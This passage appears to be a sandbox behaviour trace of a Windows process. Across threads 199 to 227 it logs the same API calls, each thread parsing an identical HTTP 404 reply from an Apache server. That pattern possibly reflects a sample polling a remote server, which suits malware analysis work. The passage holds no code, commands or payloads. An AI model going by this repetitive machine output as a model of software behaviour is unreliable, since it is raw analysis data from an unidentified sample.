[0299.031] GetProcessHeap () returned 0x840000 [0299.031] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 199 os_tid = 0x12a8 [0299.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0299.595] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:18 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0299.595] GetProcessHeap () returned 0x840000 [0299.595] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0299.595] GetProcessHeap () returned 0x840000 [0299.596] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0299.596] GetProcessHeap () returned 0x840000 [0299.596] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 200 os_tid = 0xc58 [0300.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.189] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:19 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0300.189] GetProcessHeap () returned 0x840000 [0300.189] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0300.189] GetProcessHeap () returned 0x840000 [0300.189] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0300.189] GetProcessHeap () returned 0x840000 [0300.189] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 201 os_tid = 0x1278 [0300.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0300.648] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:19 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0300.648] GetProcessHeap () returned 0x840000 [0300.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0300.648] GetProcessHeap () returned 0x840000 [0300.648] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0300.648] GetProcessHeap () returned 0x840000 [0300.648] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 202 os_tid = 0xd90 [0301.155] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.156] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:20 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0301.156] GetProcessHeap () returned 0x840000 [0301.156] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0301.156] GetProcessHeap () returned 0x840000 [0301.156] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0301.156] GetProcessHeap () returned 0x840000 [0301.156] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 203 os_tid = 0xc80 [0301.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0301.672] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:20 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0301.672] GetProcessHeap () returned 0x840000 [0301.672] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0301.672] GetProcessHeap () returned 0x840000 [0301.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0301.672] GetProcessHeap () returned 0x840000 [0301.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 204 os_tid = 0x7a0 [0302.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.241] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:21 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0302.241] GetProcessHeap () returned 0x840000 [0302.241] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0302.242] GetProcessHeap () returned 0x840000 [0302.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0302.242] GetProcessHeap () returned 0x840000 [0302.242] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 205 os_tid = 0x8a8 [0302.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0302.730] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:21 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0302.730] GetProcessHeap () returned 0x840000 [0302.730] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0302.730] GetProcessHeap () returned 0x840000 [0302.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0302.730] GetProcessHeap () returned 0x840000 [0302.730] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 206 os_tid = 0x6a0 [0303.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.237] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.237] GetProcessHeap () returned 0x840000 [0303.237] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0303.237] GetProcessHeap () returned 0x840000 [0303.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0303.237] GetProcessHeap () returned 0x840000 [0303.237] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 207 os_tid = 0x1318 [0303.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0303.731] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:22 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0303.731] GetProcessHeap () returned 0x840000 [0303.731] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0303.731] GetProcessHeap () returned 0x840000 [0303.731] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0303.731] GetProcessHeap () returned 0x840000 [0303.731] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 208 os_tid = 0x1308 [0304.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.304] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:23 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.304] GetProcessHeap () returned 0x840000 [0304.304] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0304.304] GetProcessHeap () returned 0x840000 [0304.304] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0304.304] GetProcessHeap () returned 0x840000 [0304.304] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 209 os_tid = 0x1314 [0304.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0304.789] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:23 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0304.789] GetProcessHeap () returned 0x840000 [0304.789] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0304.789] GetProcessHeap () returned 0x840000 [0304.789] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0304.789] GetProcessHeap () returned 0x840000 [0304.789] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 210 os_tid = 0x35c [0305.254] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.254] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:24 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.254] GetProcessHeap () returned 0x840000 [0305.254] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0305.254] GetProcessHeap () returned 0x840000 [0305.255] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0305.255] GetProcessHeap () returned 0x840000 [0305.255] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 211 os_tid = 0xcb8 [0305.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0305.739] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:24 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0305.739] GetProcessHeap () returned 0x840000 [0305.740] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0305.740] GetProcessHeap () returned 0x840000 [0305.740] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0305.740] GetProcessHeap () returned 0x840000 [0305.740] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 212 os_tid = 0x1274 [0306.224] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.225] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.225] GetProcessHeap () returned 0x840000 [0306.225] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0306.225] GetProcessHeap () returned 0x840000 [0306.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0306.225] GetProcessHeap () returned 0x840000 [0306.225] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 213 os_tid = 0x6e4 [0306.704] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0306.705] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:25 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0306.705] GetProcessHeap () returned 0x840000 [0306.705] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0306.705] GetProcessHeap () returned 0x840000 [0306.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0306.705] GetProcessHeap () returned 0x840000 [0306.705] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 214 os_tid = 0x8d0 [0307.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.198] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:26 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.198] GetProcessHeap () returned 0x840000 [0307.198] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0307.198] GetProcessHeap () returned 0x840000 [0307.198] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0307.198] GetProcessHeap () returned 0x840000 [0307.198] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 215 os_tid = 0x808 [0307.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0307.676] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:26 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0307.676] GetProcessHeap () returned 0x840000 [0307.676] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0307.676] GetProcessHeap () returned 0x840000 [0307.676] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0307.676] GetProcessHeap () returned 0x840000 [0307.676] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 216 os_tid = 0x708 [0308.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.235] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:27 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0308.235] GetProcessHeap () returned 0x840000 [0308.235] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0308.235] GetProcessHeap () returned 0x840000 [0308.235] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0308.235] GetProcessHeap () returned 0x840000 [0308.235] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 217 os_tid = 0xbe4 [0308.688] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.728] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:27 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0308.728] GetProcessHeap () returned 0x840000 [0308.728] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0308.728] GetProcessHeap () returned 0x840000 [0308.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0308.728] GetProcessHeap () returned 0x840000 [0308.728] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 218 os_tid = 0x117c [0309.176] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.176] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:28 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.176] GetProcessHeap () returned 0x840000 [0309.176] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0309.176] GetProcessHeap () returned 0x840000 [0309.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0309.176] GetProcessHeap () returned 0x840000 [0309.176] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 219 os_tid = 0x98c [0309.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.792] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:28 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0309.792] GetProcessHeap () returned 0x840000 [0309.792] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0309.792] GetProcessHeap () returned 0x840000 [0309.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0309.792] GetProcessHeap () returned 0x840000 [0309.792] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 220 os_tid = 0xe4c [0310.408] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.409] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:29 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.409] GetProcessHeap () returned 0x840000 [0310.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0310.409] GetProcessHeap () returned 0x840000 [0310.409] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0310.409] GetProcessHeap () returned 0x840000 [0310.409] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 221 os_tid = 0x4d0 [0310.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0310.926] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:30 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0310.926] GetProcessHeap () returned 0x840000 [0310.926] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0310.926] GetProcessHeap () returned 0x840000 [0310.926] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0310.926] GetProcessHeap () returned 0x840000 [0310.926] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 222 os_tid = 0x125c [0311.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0311.519] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:30 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0311.519] GetProcessHeap () returned 0x840000 [0311.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0311.519] GetProcessHeap () returned 0x840000 [0311.519] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0311.519] GetProcessHeap () returned 0x840000 [0311.519] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 223 os_tid = 0x1300 [0312.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.064] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.064] GetProcessHeap () returned 0x840000 [0312.064] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0312.064] GetProcessHeap () returned 0x840000 [0312.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0312.064] GetProcessHeap () returned 0x840000 [0312.064] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 224 os_tid = 0xe3c [0312.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0312.649] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:31 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0312.649] GetProcessHeap () returned 0x840000 [0312.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0312.649] GetProcessHeap () returned 0x840000 [0312.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0312.649] GetProcessHeap () returned 0x840000 [0312.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 225 os_tid = 0x6fc [0313.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.164] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:32 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.164] GetProcessHeap () returned 0x840000 [0313.164] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0313.164] GetProcessHeap () returned 0x840000 [0313.164] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0313.164] GetProcessHeap () returned 0x840000 [0313.164] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 226 os_tid = 0x12f8 [0313.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0313.698] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:32 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0313.698] GetProcessHeap () returned 0x840000 [0313.698] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0313.698] GetProcessHeap () returned 0x840000 [0313.699] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 [0313.699] GetProcessHeap () returned 0x840000 [0313.699] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 Thread: id = 227 os_tid = 0x2d4 [0314.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0314.235] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Tue, 28 Sep 2021 05:28:33 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0314.235] GetProcessHeap () returned 0x840000 [0314.235] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x10) returned 0x878aa0 [0314.235] GetProcessHeap () returned 0x840000 [0314.235] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x878aa0 | out: hHeap=0x840000) returned 1 